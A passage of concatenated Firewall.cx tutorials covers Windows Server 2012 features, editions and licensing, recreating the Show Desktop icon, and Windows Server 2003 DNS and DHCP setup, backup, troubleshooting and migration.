This time-saving feature ensures VPN users experience a seamlessly VPN connection to the office without the frustration of login in every time Internet connectivity is lost, while also allowing the automation of other tasks in the background (e.g Remote backup of files).

Data Deduplication

Data Deduplication is a specialized data compression technique for eliminating duplicate copies of repeating data.  In the deduplication process, unique chunks of data, or byte patterns, are identified and stored during a process of analysis. As the analysis continues, other chunks are compared to the stored copy and whenever a match occurs, the redundant chunk is replaced with a small reference that points to the stored chunk. 

We should note that Data Deduplication is not only a Windows 2012 Server feature, but a technology supported by many vendors such as EMC, NetApp, Symantec and others.

Window-less Interface: CLI Only-Mode

Microsoft now supports Windows Server 2012 without a graphical user interface (GUI). This means you can install and configure a Windows Server 2012 with GUI and after finishing the setup, remove the GUI completely!  You also have the option to install the Windows Server 2012 with GUI or without GUI.

Running your server without a GUI interface will help save valuable resources and also increase the system’s stability.

IP Address Management (IPAM)

IPAM is a central IP address management tool of your entire network. IPAM can work with DNS and DHCP to better allocate, discover, issue, lease and renew IP addresses. IPAM gives a central view of where IP addresses are being used within your network.

Resilient File System (ReFS)

ReFS is Microsoft’s latest file system capable of replacing the well-known NTFS file system. The main advantage of ReFS is automatic error correction (verify and auto-corect process) regardless of the underlying hardware. ReFS uses checksum to detect and correct errors. The ReFS file system has the ability to support a maximum file size of 16 Exabytes (16.7 Million TBytes!) and a maximum volume size of 1 Yottabyte (1.1 Trilion TBytes)

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Summary

Undoubtedly Windows Server 2012 is packed with new features and additions, designed to help organizations take advantages of cost optimizing features like Hyper V, Storage Spaces, PowerShell 3.0, Data Deduplication, SMB 3.0, new Server Manager and others. Microsoft has also simplified the licensing schemes and introduced  four editions of Server 2012. These are Foundation, Essentials, Standard and Datacenter edition. Follow this link to read our article covering Windows 2012 Server editions and licensing requirements.

 

  • Hits: 23984

Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features.

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Windows Server 2012 Editions

windows-2012On the 1st of August, 2012 Microsoft released Windows Server 2012– the sixth release of the Windows Server product family. On May 21st 2013, Windows Server 2012 R2 was introduced and is now the latest version of Windows Server in the market.  Microsoft has released four different editions of Windows Server 2012 varying in cost, licensing and features. These four editions of Windows Server 2012 R2 are: Windows 2012 Foundation edition, Windows 2012 Essentials edition, Windows 2012 Standard edition and Windows 2012 Datacenter edition.

Let’s take a closer look at each Windows Server 2012 edition and what they have to offer.

Users can also download the free Windows Server 2012 R2 Licensing Datasheet in our Windows Server Datasheets & Useful Resources download section, which provides a detailed overview of the Licensing for Windows Server 2012 and contains extremly useful information on the various Windows Server 2012 edition, examples on how to calculate your licensing needs, Virtualization instances supported by every edition,  server roles, common questions & answers, plus much more.

More technical articles covering Windows 2012 Server and Hyper-V Virtualization are available in our Windows 2012 Server section.

Windows Server 2012 Foundation Edition

This edition of Windows Server 2012 is targeted towards small businesses of up to 15 users. The Windows Server 2012 R2 Foundation edition comes pre-installed on hardware server with single physical processor and up to 32GB of DRAM memory. Foundation edition can be implemented in environments where features such as file sharing, printer sharing, security and remote access are required. Advanced server features such as Hyper V, RODC (Read Only Domain Controller), data deduplication, dynamic memory, IPAM (IP Address Management), server core, certificate service role, hot add memory, windows update services and failover clustering are not available in the Foundation edition.

Windows Server 2012 Essentials Edition

The Windows Server 2012 R2 Essentials edition is the next step up, also geared towards small businesses of up to 25 users.  Windows Server 2012 R2 Essentials edition is available in retail stores around the world making it easy for businesses to install the new operating system without necessarily purchasing new hardware. Similar to the Foundation edition, the Essentials edition does not support many advanced server features, however it does provide support of features like Hyper V, dynamic memory and hot add/remove RAM.

Windows Server 2012 R2 Essentials edition can run a single instance of virtual machine on Hyper V, a feature that was not available in Windows Server 2012 Essentials (non-R2) edition. This single virtual machine instance can be Windows Server 2012 R2 Essential edition only, seriously limiting the virtualization options but allowing companies to begin exploring the benefits of the virtualization platform.

Windows Server 2012 Standard Edition

The Windows Server 2012 R2 Standard edition of windows server is used for medium to large businesses that require additional features not present in the Foundation & Essential edition. The Standard edition is able to support an unlimited amount of users, as long as the required user licenses have been purchased.

Advanced features such as certificate services role, Hyper V, RODC (Read Only Domain Controller), IPAM (IP Address Management), Data deduplication, server core, failover clustering and more, are available to Windows Server 2012 Standard edition. We should note that the Standard edition supports up to 2 Virtual Machines.

Windows Server 2012 Datacenter Edition

The Windows Server 2012 R2 Datacenter edition is the flagship product created to meet the needs of medium to large enterprises. The major difference between the Standard and Datacenter edition is that the Datacenter edition allows the creation of unlimited Virtual Machines and is therefore suitable for environments with extensive use of virtualization technology.

Before purchasing the Windows Server 2012 operating system, it is very important to understand the difference between various editions, the table below shows the difference between the four editions of Windows Server 2012:

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

 Editions

Foundation

Essentials

Standard

Datacenter

Distribution

OEM Only

Retail, volume licensing, OEM

Retail, volume licensing, OEM

Volume licensing and OEM

Licensing Model

Per Server

Per Server

Per CPU pair + CAL/DAL

Per CPU pair + CAL/DAL

Processor Chip Limit

1

2

64

64

Memory Limit

32GB

64GB

4TB

4TB

User Limit

15

25

Unlimited

Unlimited

File Services limits

1 standalone DFS root

1 standalone DFS root

Unlimited

Unlimited

Network Policy & Access Services limits

50 RRAS connections and 10 IAS connections

250 RRAS connections, 50 IAS connections, and 2 IAS Server Groups

Unlimited

Unlimited

Remote Desktop Services limits

50 Remote Desktop Services connections

Gateway only

Unlimited

Unlimited

Virtualization rights

n/a

Either in 1 VM or 1 physical server, but not both at once

2 VMs

Unlimited

DHCP, DNS, Fax server, Printing,  IIS Services

Yes

Yes

Yes

Yes

Windows Server Update Services

No

Yes

Yes

Yes

Active Directory Services

Yes, Must be root of forest and domain

Yes, Must be root of forest and domain

Yes

Yes

Active Directory Certificate Services

Certificate Authorities only

Certificate Authorities only

Yes

Yes

Windows Powershell

Yes

Yes

Yes

Yes

Server Core mode

No

No

Yes

Yes

Hyper-V

No

No

Yes

Yes

Windows  Server 2012 Licensing - Understanding Client Access License (CAL) & Device Access License (DAL) Licensing Models

The standard and datacenter editions of Server 2012 support Client Access License (CAL) or Device Access License (DAL) licensing model. A CAL license is assigned to a user whereas a DAL license is assigned to device (computer). For example, a CAL assigned to a user, allows only that user to access the server via any device. Likewise, if a DAL is assigned to particular device, then any authenticated user using that device is allowed to access the server.

We can use a simple example to help highlight the practical differences between CAL and DAL licensing models and understand the most cost-effective approach:

Assume an environment with Windows Server 2012 R2 standard edition and a total of 50 users and 25 devices (workstations). In this case, we can purchase either 50 CAL licenses to cover the 50 users we have or alternatively 25 DAL licenses to cover the total amount of workstations that need to access the server. In this scenario, purchasing DALs is a more cost effective solution.  

If however we had 10 users with a total of 20 devices , e.g 2 devices per user (workstation & laptop), then it more be more cost effective to purchase 10 CAL licenses.

Windows Server 2012 Foundation Edition Licensing Model

Windows Server 2012 Foundation is available to OEMs (Original Equipment Manufacturers) only and therefore can only be purchased at the time of purchasing a n new hardware server. Windows 2012 Foundation edition supports up to 15 users. CALs or DALs are not required for the Foundation edition servers. In addition, Foundation edition owners cannot upgrade to other editions. The maximum number of SMB (Server Message Block or file sharing) connections to the server is 30. Similarly, maximum number of RRAS (Routing and Remote Access Service) and RDS (Remote Desktop Service) connections is 50.

Windows Server 2012 Essentials Edition Licensing Model

The Essential edition of server 2012 is available to OEMs (with the purchase of new hardware) and also at retail stores. The user limit of this server edition is 25 and device limit is 50. This means that a maximum of 25 users amongst 50 computers can access the Windows Server 2012 Essentials edition. For example, you have 20 users rotating randomly amongst 25 computers accessing the Server 2012 Essentials edition, without any problem. CALs or DALs are not required for Windows Server 2012 Essentials edition because no more than 25 users can access the server.

 A common question at this point is what if the organization expands and increases its users and computers?

 In these cases Microsoft provides an upgrade path allowing organizations to upgrade to the Windows Server 2012 Standard or Datacenter edition license and perform an in-place license transition. Once the transition is complete, the user limitation, and other features are unlocked without requiring migration or reinstallation of the server.

Companies upgrading to a higher edition of Windows 2012 Server should keep in mind that it will be necessary to purchase the required amount of CALs or DALs according to their users or devices.

Administrators will be happy to know that it is also possible to downgrade the Standard edition of Server 2012 to the Essentials edition. For example, it is possible to run Essential edition of Server 2012 as virtual machine utilizing one of two available virtual instances in Standard edition as shown in the figure below. This eliminates the needs to purchase Essential edition of Server 2012.

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

With the release of Windows Server 2012 Essentials R2, Microsoft has updated its licensing model. Unlike Windows Server 2012 Essentials (non-R2), you can now run a single instance of a virtual machine.

The Hyper-V role and Hyper-V Manager console are now included with Windows Server 2012 R2 Essentials. The server licensing rights have been expanded, allowing you to install an instance of Essentials on your physical server to run the Hyper-V role (with none of the other roles and features of the Essentials Experience installed), and a second instance of Essentials as a virtual machine (VM) on that same server with all the Essentials Experience roles and features.

Windows Server 2012 Standard Edition & Datacenter Edition Licensing Model

The license of Standard and Datacenter edition is based on sockets (CPUs) and CAL or DAL. Definition of a socket is a CPU or physical processor. Logical cores are not counted as sockets. A single license of Standard and Datacenter edition covers up to two physical processors per physical server. CAL or DAL licenses are then required so that clients/devices can access the Windows server. Standard edition allows up to 2 virtual instances while the Datacenter edition allows unlimited number of virtual instances.

For example, a Windows 2012 Server R2 Standard edition installed on a physical server with one socket (CPU) can support up to two instances of virtual machines. These virtual machines can be Server 2012 R2 Standard or Essentials edition. Similarly, if you install a Windows Server 2012 R2 Datacenter edition, then you can install an unlimited number of virtual machines.

Let’s look at some examples on deploying Standard and Datacenter edition servers and calculating the licenses required:

Scenario 1: Install Server 2012 Standard/Datacenter Edition on a server box with four physical processors and 80 users.

In this scenario, we will be required to purchase two Standard/Datacenter Edition licenses because a single license covers up to two physical processors, plus 80 CAL licenses so our users can access the server resources.

Scenario 2: Install Server 2012 Standard Edition on a physical server with 1 physical processor, running 8 instances of virtual machines. A total of 50 users will be accessing the server.

Here, four Server 2012 Standard edition licenses are required and 50 CALs or DALs. Remember that a single Standard edition license covers up to two physical processors and up to two instances of virtual machines. Since the requirement is to run 8 instances of virtual machines, we need four Standard edition licenses.

If we decided to use the Datacenter edition in this scenario, a single license with 50 CAL would be enough to cover our needs, because the Datacenter edition license supports an unlimited number of virtual instances and up to two physical processors.

Summary

Microsoft’s Windows Server 2012 is an attractive server-based product designed to meet the demands of small to large enterprises and has a very flexible licensing model. It is very important to fully understand the licensing options and supported features on each of the 4 available editions, before proceeding with your purchase – a tactic that will help ensure costs are kept well within the allocated budget while the company’s needs are fully met.

  • Hits: 273081

How to Recover & Create "Show Desktop" Icon Function on Windows 7, Vista, XP and 2000


Wndows show desktop iconThe Show Desktop feature, included with almost all versions of Windows up to Windows 7, allows a user to minimize or restore all open programs and easily view the desktop. To use this feature, a user must simply click Show Desktop on the Quicklaunch toolbar to the right of the taskbar.

A common problem amongst Windows users is that the Show Desktop icon can accidentally be deleted, thus losing the ability to minimize all open programs and reveal your desktop.

This short article will explain how you can recover and create the Show Desktop icon and restore this functionality. The instructions included are valid for Windows 95, 98, 2000, Windows Vista and Windows 7 operating systems.

To recreate the Show Desktop icon, follow these steps:

1) Click on Start, Run, type Notepad and click on OK or Hit Enter. Alternatively, open the Notepad application.

2) Carefully copy and paste the following text into the Notepad window:

  [Shell]
    Command=2
    IconFile=explorer.exe,3
    [Taskbar]
    Command=ToggleDesktop
On the File menu, click Save As, then save the file to your desktop as Show desktop.scf. The Show Desktop icon is now created on your desktop.

 3) Finally, click and drag the Show Desktop icon to your Quick Launch toolbar.
  • Hits: 25923

Windows 2003 DNS Server Installation & Configuration

DNS is used for translating host names to IP addresses and the reverse, for both private and public networks (i.e.: the Internet). DNS does this by using records stored in its database. On the Internet DNS mainly stores records for public domain names and servers whereas in private networks it may store records for client computers, network servers and data pertaining to Active Directory.

In this article, we will install and configure DNS on a standalone Windows Server 2003. We will begin by setting up a cache-only DNS server and progress to creating a primary forward lookup zone, a reverse lookup zone, and finally some resource records. At the end of this article we will have set up a DNS server capable of resolving internal and external host names to IP addresses and the reverse.

Install DNS on Windows Server 2003

Before installing and configuring DNS on our server we have to perform some preliminary tasks. Specifically, we have to configure the server with a static IP address and a DNS suffix. The suffix will be used to fully-qualify the server name. To begin:

1. Go to Start > Control Panel > Network Connections , right-click Local Area Connection and choose Properties .

2. When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click Properties . When the Internet Protocol (TCP/IP) window comes up, enter an IP address , subnet mask and default gateway IP addresses that are all compatible with your LAN.

Our LAN is on a 192.168.1.0/24 network, so our settings are as follows:

tk-windows-dns-p1-1

3. For the Preferred DNS Server , enter the loopback address 127.0.0.1 . This tells the server to use its own DNS server service for name resolution, rather than using a separate server. After filling out those fields , click the Advanced button.

4. When the Advanced TCP/IP Settings window comes up, click the DNS tab, enter firewall.test on the DNS suffix for this connection text field, check Register this connection's address in DNS , check Use this connection's DNS suffix in DNS registration , and click OK , OK , and then Close:

tk-windows-dns-p1-2

 

Now that we have configured our server with a static IP address and a DNS suffix, we are ready to install our DNS Server. To do this:

1. Go to Start > Control Panel > Add or Remove Programs .

2. When the Add or Remove Program window launches, click Add/Remove Windows Components on the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

4. When the Networking Services window appears, place a check mark next to Domain Name System (DNS) and click OK and OK again.

 

tk-windows-dns-p1-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DNS installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the install.

After this, DNS should be successfully installed. To launch the DNS MMC, go to Start > Administrative Tools > DNS

tk-windows-dns-p1-4

As our DNS server was just installed it is not populated with anything. On the left pane of the DNS MMC, there is a server node with three nodes below it, titled Forward Lookup Zones, Reverse Lookup Zones and Event Viewer.

The Forward Lookup Zones node stores zones that are used to map host names to IP addresses, whereas the Reverse Lookup Zones node stores zones that are used to map IP addresses to host names.

Setting Up a Cache-Only DNS Server

A cache-only DNS server contains no zones or resource records. Its only function is to cache answers to queries that it processes, that way if the server receives the same query again later, rather than go through the recursion process again to answer the query, the cache-only DNS server would just return the cached response, thereby saving time. With that said, our newly installed DNS server is already a cache-only DNS server!

Creating a Primary Forward Lookup Zone

With its limited functionality, a cache-only DNS server is best suited for a small office environment or a small remote branch office. However, in a large enterprise where Active Directory is typically deployed, more features would be needed from a DNS server, such as the ability to store records for computers, servers and Active Directory. The DNS server stores those records in a database, or a zone .

DNS has a few different types of zones, and each has a different function. We will first create a primary forward lookup zone titled firewall.test . We do not want to name it firewall.cx , or any variation that uses a valid top-level domain name, as this would potentially disrupt the clients' abilities to access the real websites for those domains.

1. On the DNS MMC, right-click the Forward Lookup Zones node and choose New Zone .

2. When the New Zone Wizard comes up, click Next .

3. On the Zone Type screen, make sure that Primary zone is selected and click Next .

4. On the Zone Name screen, type firewall.test .

5. On the Zone File screen, click Next .

6. On the Dynamic Update screen, make sure that “ Do not allow dynamic updates ” is selected and click Next .

7. On the next screen, click Finish .

We now have a foundation that we can place resource records in for name resolution by internal clients.

Creating a Primary Reverse Lookup Zone

Contrary to the forward lookup zone, a reverse lookup zone is used by the DNS server to resolve IP addresses to host names. Not as frequently used as forward lookup zones, reverse lookup zones are often used by anti-spam systems in countering spam and by monitoring systems when logging events or issues. To create a reverse lookup zone:

1. On the DNS MMC, right-click the Reverse Lookup Zones node and choose New Zone .

2. When the New Zone Wizard comes up, click Next .

3. On the Zone Type screen, make sure that Primary zone is selected and click Next .

4. On the Reverse Lookup Zone Name screen, enter 192.168.1 and click Next .

5. On the Zone File screen, click Next .

6. On the Dynamic Update screen, make sure that “Do not allow dynamic updates” is selected and click Next .

7. On the next screen, click Finish .

tk-windows-dns-p1-5

There is now a reverse lookup zone titled 192.168.1.x Subnet on the left pane of the DNS MMC. This will be used to store PTR records for computers and servers in those subnets.

Using the instructions above, go ahead and create two additional reverse lookup zones, one for a 192.168.2.x subnet and for a 192.168.3.x subnet.

Creating Resource Records

DNS uses resource records (RRs) to tie host names to IP addresses and the reverse. There are different types of resource records, and the DNS server will respond with the record that is requested in a query.

The most common resource records are: Host (A); Mail Exchanger (MX); Alias (CNAME); and Service Location (SRV) for Active Directory zones. As such, we will create all but SRV records because Active Directory will create those automatically:

1. On the DNS MMC, expand the Forward Lookup Zones node followed by the firewall.test zone.

2. Right-click firewall.test zone and choose Other New Records .

3. On the Resource Record Type window, select Host (A) and click Create Record

4. On the New Resource Record window, type “ webserver001 ” on the Host text field, type “ 192.168.2.200” in the IP address text field, check the box next to “Create associated pointer (PTR) record” and click OK .

This tells DNS to create a PTR record in the appropriate reverse lookup zone. And, for demonstration purposes, it does not matter whether this server actually exists or not.

5. Back at the Resource Record Type window, select Host (A) again and click Create Record .

6. On the New Resource Record window, type “ mailserver001 ” on the Host text field and type “ 192.168.3.200” in the IP address text field. Make sure that the check box next to “Create associated pointer (PTR) record” is checked and click OK . A corresponding PTR record will be created in the appropriate reverse lookup zone.

7. Back at the Resource Record Type window, select Alias (CNAME) and click Create Record .

8. On the New Resource Record window, type “ www ” on the Alias name text field, then click Browse .

9. On the Browse window, double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test , and finally double-click webserver001 . This should populate the webserver001's fully qualified domain name in the Fully qualified domain name (FQDN) for target host text field. Click OK afterwards.

10. Back at the Resource Record Type window, select Mail Exchanger (MX) and click Create Record .

11. On the New Resource Record window, click Browse , double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test, and finally double-click mailserver001 . This should populate the mailserver001's fully qualified domain name in the Fully qualified domain name (FQDN) of mail server text field. Click OK afterwards.

12. Back at the Resource Record Type window, click Done .

Summary

Our standalone Windows Server 2003 DNS server now has a primary forward lookup zone, a primary reverse lookup zone, and multiple resource records. As a standard function, it will also cache the answers to queries that it has already resolved.

  • Hits: 75514

Windows 2003 DHCP Server Advanced Configuration - Part 2

Part 1 of our Windows 2003 DHCP Server Advanced Configuration article explained the creation and configuration of DHCP Scope options and how to configure various DHCP server settings. This article focuses on backing up and restoring the DHCP server database, troubleshooting DHCP using a packet analyser and more.

Backing up the DHCP database

Our DHCP server is fully functional but it may not always remain that way. We definitely want to back it up so we can quickly restore the functionality in the event of a disaster.

The DHCP scopes, settings and configuration are actually kept in a database file, and the database is automatically backed up every 60 minutes. But to manually back it up:

  • On the DHCP MMC, right-click the server node and choose Backup
  • When the Browse for Folder window comes up, verify that it points to C :\windows\system32\dhcp\backup and click OK:

tk-windows-dhcp-2k3-advanced-12

Restoring the DHCP Database

Let us imagine that a disaster with the DHCP server did occur and that we now have to restore the DHCP functionality. Restoring the DHCP database is just as simple as backing it up:

  1. 1. On the DHCP MMC, right-click the server node and choose Restore
  2. 2. When the Browse for Folder window comes up, click OK
  3. 3. You will receive a prompt informing you that the DHCP service will need to be stopped and restarted for the restore to take place. Click OK

The DHCP database will then be restored.

Troubleshooting DHCP

Let us imagine that, after restoring the database, the DHCP server developed some issues and started malfunctioning. Luckily, DHCP comes equipped with several tools to help us troubleshoot.

Event Viewer

The Event Viewer displays events that the server has reported and whether those events represent actual issues or normal operation. Most of the issue events related to DHCP will be reported in the System log of the Event Viewer with a Source of DHCPServer.

To view the Event Viewer:

  1. Go to Start > Administrative Tools > Event Viewer
  2. When the Event Viewer window comes up, click the System log on the left pane and its events will be displayed on the right pane.

Depending on how active the server is, the System log may be cluttered with Information, Warning and Error events that are unrelated to DHCP. To see only DHCP issues, filtering non-important events is necessary. To do this:

  1. Go to the View > Filter
  2. When the System Properties window comes up, click on the Event Source drop-down menu and select DHCPServer . This tells the log to display only DHCP server events.
  3. Next, uncheck the box next to Information . This tells the log to display only events regarding issues.
  4. (Optional) On the From and To drop-down menus on the bottom, adjust the time and date frame to when an issue was suspected to have occurred.
  5. When finished, click OK

The System log is now displaying only DHCP Warning and Error events. This should cause any DHCP-related issues to stick out:

tk-windows-dhcp-2k3-advanced-13

Every event has an Event ID. In case a particular event's description is too vague to understand, you may have to research the Event ID for further clarification.

DHCP Audit Logs

Another DHCP troubleshooting tool is the DHCP audit logs. These logs display detailed information about what the DHCP server has been doing. If a client leases an IP address, renews its IP address, or releases its IP address, the DHCP server will audit this activity.

More concerning events are also audited: if the DHCP server service stops, encounters a rogue DHCP server in the network, or fails to start, the server will audit this issue as well. These logs provide closer visibility into what the DHCP server is doing.

To access the DHCP audit logs:

  1. Go to Start > Run
  2. When the Run box comes up, type c:\windows\system32 and click OK
  3. When the System32 folder comes up, navigate to and double-click the dhcp folder.

In the dhcp folder, the log files will be titled DhcpSrvLog -%WeekDay%. log, where %WeekDay% is a week day. There should be one for the past six days.

tk-windows-dhcp-2k3-advanced-14

The log may appear overwhelming, but it is very simple to read. Each line contains several pieces of information but the most important is the code at the beginning of the line, since that describes what is being audited. That code is defined on the top portion of the log file. As each line is comma-separated you can actually save the log file in .csv format and open it in Excel for easier and more convenient reading and analysis.

Protocol Analyzer

Although a Network protocol analyzer is not an official DHCP troubleshooting tool, it is nonetheless an excellent tool for troubleshooting issues where the server is not servicing clients. In such situations you would use the protocol analyzer on the server to determine whether DHCP Discover/Request packets from clients are arriving at the server at all or if they are arriving but being ignored by the server.

If you find that the packets are not arriving at the server at all, you would have isolated the problem to most likely being a routing issue or an issue with any relay agents/configured IP helpers in the network.

However, if you find that the packets are arriving but being ignored by the server, then you would have isolated the problem to either residing on the server or the configuration of DHCP.

The screen shot below, of Wireshark, shows that the server received a DHCP Discover packet from a client and properly responded to it.

tk-windows-dhcp-2k3-advanced-15

DHCP Migration

Continuing from our previous storyline, let us pretend that we found the issue that was affecting our DHCP server but to fix it we would have to take the DHCP server offline for a considerable amount of time, so for the time being we will just setup a different server as our DHCP server.

To accomplish this, we will have to transfer the DHCP database to our new server. Migrating the DHCP database is not only done in situations such as this. When a DHCP server is decommissioned, for example, you would need to transfer the DHCP database to the new server.

Although the transfer can technically be done in more than one way, presented below is one method. Regardless of the approach chosen, you should aim to minimize the amount of time that both DHCP servers are simultaneously active and able to service clients as this would increase the chances of one server leasing an IP address that is already in use.

  1. On the old server, go to Start > Run , type cmd , and click OK .
  2. When the Command Prompt window comes up, type netsh dhcp server export c:\dhcp_backup.txt all and hit Enter. This command exports all the scopes in the DHCP database to a file titled dhcp_backup.txt .
  3. Copy the export file ( dhcp_backup.txt ) to the new server.
  4. On the new server, install the DHCP server role. Do not authorize the DHCP server yet.
  5. On the new server, go to Start > Run , type cmd , and click OK .
  6. When the Command Prompt window comes up, type netsh dhcp server import c:\dhcp_backup.txt all and hit Enter. This command imports all the scopes in the DHCP database from the file titled dhcp_backup.txt .
  7. On the new server, enable conflict detection so IP addresses that have been leased out by the old server since the start of the migration are not reissued.

a. On the DHCP MMC, right-click the server node and choose Properties

b. When the Properties window comes up, click the Advanced tab.

c. On Conflict Detection Attempts , increase the number to 2 just to be safe. This tells the server to ping an IP address before it assigns it. If there is a response, then the DHCP server will not lease out the IP address since that address would already be assigned.

d. Click OK

8. On the new server, authorize the DHCP server.

9. On the old server, unauthorized the DHCP server.

Although we could perform a migration by simply backing up the DHCP database on the old server using the backup procedure and restoring it on the new server using the restore procedure, this approach also restores the old DHCP server's configuration settings, such as audit settings, conflict detection settings, DDNS settings, etc. It may not always be desirable to transfer those settings in a migration. The procedure described above only transfers the scopes and their settings.

Conclusion

Without careful observation, the full capabilities of DHCP can be overlooked. The protocol, in combination with the DHCP MMC, provides numerous methods to control client configuration settings and server administrative functions.

  • Hits: 26802

Windows 2003 DHCP Server Advanced Configuration - Part 1

In this article, we will cover more advanced DHCP features and topics such as server options, superscopes, multicast scopes, dynamic DNS, DHCP database backup and restoration, DHCP migration, and DHCP troubleshooting. We will cover these topics in two ways: by building out from our earlier implementation and by using our imagination!

Ok, using our imagination for this purpose may seem silly but doing so will give us the opportunity to indirectly learn how, why, and where these advanced DHCP features and topics come into play in a real-world network and how other networking technologies are involved in a DHCP implementation.

We will imagine that we are building our DHCP server for a company that has two buildings, Building A and Building B, each with a single floor (for now). Building A is on a 192.168.0.0/24 network and Building B is on a 192.168.1.0/24 network.

Although each building has its own DNS server (192.168.0.252 and 192.168.1.252), WINS server (192.168.0.251 and 192.168.1.251) and Cisco Catalyst 4507R-E switch (192.168.0.254 and 192.168.1.254), only a single DHCP server exists – it is the one that we have been building and it resides in Building A.

The clients and servers in each building connect to their respective Cisco Catalyst switches and the switches are uplinked to a Cisco router for Internet connectivity. The only notable configuration is with the Building B switch: It is configured with the ip helper-address 192.168.0.253 command.

The ip helper-address command tells the switch to forward DHCP requests in the local subnet to the DHCP server, since the clients in Building B cannot initially communicate with the DHCP server directly. We are not concerned with any other configuration or networking technologies for now.

Server Options

The specifications of our imaginary company state that the company has two buildings – Building A and Building B. In our first article, we created a scope called “Building A, Floor 1” so a scope for our first building is already made. In this article, we will create a scope for Building B, Floor 1, using the instructions from our Basic DHCP Configuration article and the following specifications for the scope:

tk-windows-dhcp-2k3-advanced-1

After creating the scope, we want to activate it as well.

Notice that, in creating this scope, we had to input a lot of the same information from our “Building A, Floor 1” scope. In the event that we had several other scopes to create, we would surely not want to be inputting the same information each time for each scope.

That is where server options are useful. Server options allow you to specify options that all the scopes have in common. In creating two scopes, we noticed that our scopes had the following in common:

  • DNS servers
  • WINS servers
  • Domain name

To avoid having to enter this information again, we will create these options as server options. To do this:

1. On the DHCP MMC, right-click Server Options and choose Configure Options

tk-windows-dhcp-2k3-advanced-2

When the Server Options window comes up, take a moment to scroll down through the long list of available options. Not all options are needed or used in every environment. In some cases, however, a needed option is not available. For example, Cisco IP phones require Option 150 but because that option is not available it would have to be defined manually. Other than that, options 006 DNS Servers, 015 DNS Domain, and 003 Router are generally sufficient.

2. Scroll down to option 006 DNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, type 192.168.0.252 for the IP Address and click Add. Then enter 192.168.1.252 as another IP Address and click Add again. This will add those two servers as DNS servers.

3. Scroll down to option 015 DNS Domain Name and place a checkmark in its box. This will activate the Data Entry section. In that section, enter firewall.cx in the String Value text field.

4. Scroll down to option 044 WINS/NBNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, enter 192.168.0.251 for the IP Address and click Add. Then enter 192.168.1.251 as another IP Address and click Add again. This will add those two servers as WINS servers.

5. Scroll down to option 046 WINS/NBT Node Type and place a checkmark in its box to activate the Data Entry section. In that section, enter “0x8” for the Byte text field and click OK . This will set the workstation node type to 'Hybrid' which is preffered.

Back on the DHCP MMC, if you click on the Server Options node you will see the following:

tk-windows-dhcp-2k3-advanced-3

Subsequent scopes will inherit these options if no scope options are specified. However, if scope options are specified then the scope options would override the server options in assignment.

If we did have Cisco IP phones in our environment we would define Option 150 as follows:

1. Right-click the server node on the DHCP MMC and choose Set Predefined Options

2. When the Predefined Options and Values window comes up, click Add

3. When the Options Type window comes up, type a name for the option such as “TFTP Server for Cisco IP Phones”.

4. On the Data Type drop-down menu, select IP Address.

5. On the Code text field, enter 150.

6. On the Description text field, type a description for the scope, such as “Used by Cisco IP Phones”.

7. Check the box next to Array

8. Click OK twice.

If you go back to the Scope/Server Options window again, you will see Option 150 available.

tk-windows-dhcp-2k3-advanced-4

Dynamic DNS

At this point, our imaginary network can service a significant number of clients, but those clients can only be referenced by IP address. Sometimes it is necessary or helpful to reference clients by their host names rather than IP addresses.

DNS resolves client host names to IP addresses. But for DNS to be able to do that, client host names and IP addresses must already be registered in DNS. Servers are typically registered manually in DNS by the administrator, but workstations are not. So how do client workstations get registered in DNS? The answer is to use dynamic DNS (DDNS), a feature that will allow clients, or the DHCP server itself, to register clients in DNS automatically upon the client's assignment of an IP address. Fortunately, DDNS is setup to automatically work in a domain environment, granted that DNS is also setup correctly in the network.

To view the options available for DDNS:

  1. On the DHCP MMC, right-click the server node and choose Properties
  2. When the Properties window comes up, click the DNS tab.

If the network has some clients that are not in the domain, have legacy Windows operating systems, or are not capable of registering their host names and IP addresses in DNS, the two options marked below would need to be selected:

tk-windows-dhcp-2k3-advanced-5

But if that were the case, you would also have to specify credentials that the DHCP server would use for DDNS on behalf of the clients. To do this, you would:

  1. Click the Advanced tab on the Properties window.

tk-windows-dhcp-2k3-advanced-6

 

1.Click the Credentials button.

2. When the DNS Dynamic Update Credentials window comes up, enter an administrator username and password and firewall for the domain. In a real-world environment, you would create a separate username and password that would be used solely for DDNS and enter it here instead.

3. Click OK twice to exit the Properties window.

Superscopes

Let us imagine that the number of client workstations in Floor 1 of Building A was expanded beyond the number of available IP addresses that our “Building A, Floor 1” scope could offer. What would we do to provide IP addresses to those additional clients?

The following options may appear to be solutions, but they are not always feasible:

  1. Extend the scope to include more IP addresses.
  2. Create an additional scope for that network segment.
  3. Delete and recreate the scope with a different subnetmask that allows for more hosts.

The problem with the first option is that you may not always be able to extend the scope, depending on the scope's subnetmask and whether consecutive scopes were created based on that subnetting. The problem with the second option is that even if you create an additional scope, the DHCP server would not automatically lease out those IP addresses to clients of that physical network segment. Although the third option could work, this option may not always be optimal depending on how much additional network-based changes would also be needed to reach the solution.

There are a few options to solve this issue:

  1. Place the additional clients in a separate VLAN and create a scope for that VLAN that is in a completely different network
  2. Create a superscope that includes the exhausted scope and a new scope with available IP addresses

The first option could solve the problem but, since this is a DHCP article, we will address the problem by using DHCP features, so the second option will be our choice!

Superscopes allow you to join scopes from separate networks into one scope. Then, when one of the scopes runs out of IP addresses, the DHCP server would automatically start leasing out IP addresses from the other scopes in that superscope. However, solely creating a superscope is not the complete solution. As some clients in that network segment would have IP addresses from a different network, the segment's router interface would also have to be assigned an additional IP address that is in the same network as the additional scope.

To use this solution, we first have to create the additional scope. Here are the scope specifications:

